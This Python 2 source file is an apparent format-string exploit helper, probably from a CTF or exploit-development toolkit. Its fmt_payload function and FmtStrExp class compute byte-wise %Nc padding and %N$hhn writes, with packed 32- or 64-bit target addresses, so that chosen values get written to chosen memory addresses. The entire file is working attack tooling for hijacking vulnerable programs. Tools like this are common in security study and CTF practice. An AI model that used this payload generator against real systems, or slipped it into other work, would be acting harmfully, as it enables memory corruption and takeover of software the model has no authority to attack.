import struct
import re
import math

p32 = lambda x: struct.pack('<L', x)
p64 = lambda x: struct.pack('<Q', x)

def fmt_payload(fmt_table, off, bits):

    # setup efficient order of hijack target
    total_fmt = FmtStrExp.sort_multi_target(fmt_table, bits)
    value_to_hijack = [x[1] for x in total_fmt]
    address_to_hijack = [x[0] for x in total_fmt]

    # generate payload
    payload = FmtStrExp.generate_fmt(value_to_hijack, off, bits)
    if bits == 32:
        payload = FmtStrExp.generate_target(address_to_hijack, bits) + payload
    elif bits == 64:
        payload += FmtStrExp.generate_target(address_to_hijack, bits)
    else:
        raise ValueError('wrong bits {}'.format(bits))

    # clear printed
    FmtStrExp.printed = 0

    return payload

class FmtStrExp(object):
    printed = 0
    table = {
        32 : [p32, 4],
        64 : [p64, 0]  # 0 since the address of target should be put at the end of payload in x64
    }

    def __init__(self, printed=0, hij_tar=None, hij_val=None):
        self.hijack_target = hij_tar
        self.hijack_value = hij_val
        FmtStrExp.printed += printed

    @staticmethod
    def sort_multi_target(fmt_table, bits):
        ''' Arrange value per byte for optimization '''
        final_fmt = []
        for fmt, length in fmt_table.iteritems():
            final_fmt += [(fmt.hijack_target + i, (fmt.hijack_value >> 8 * i) & 0xff) for i in xrange(length)]
        return sorted(final_fmt, key=lambda x: (x[1] - FmtStrExp.table[bits][1] * len(final_fmt) - FmtStrExp.printed) & 0xff)

    @classmethod
    def generate_target(cls, target_address, bits):
        payload = ''.join(cls.table[bits][0](adr) for adr in target_address)
        return payload

    @classmethod
    def generate_fmt(cls, total_fmt, offset, bits):

        # Basic setup
        if bits == 32:
            cls.printed += cls.table[bits][1] * len(total_fmt)

        printed = cls.printed # For 64 bits
        payload = ''

        # Calculate bytes to overwrite
        for idx, byte in enumerate(total_fmt):
            pad = ((byte - cls.printed) % 256 + 256) % 256
            if pad > 0:
                payload += "%{}c".format(pad)
            payload += "%{}$hhn".format(offset + idx)
            cls.printed += pad

        # For 64 bits
        if bits == 64:
            total_length = len(payload) + printed
            payload = re.split(r'\$hhn', payload)
            if offset < 10:
                total_length += 10 - offset
            total_length = int(math.ceil(total_length / 8.0)) * 8
            offset = offset + total_length / 8

            # Replace correct offset
            for idx, _ in enumerate(payload[:-1]):
                payload[idx] = re.sub(r'\%\d+$', '%{}'.format(offset + idx), payload[idx])
            payload = '$hhn'.join(payload)
            payload = payload.ljust(total_length - printed, '\x00')

        return payload
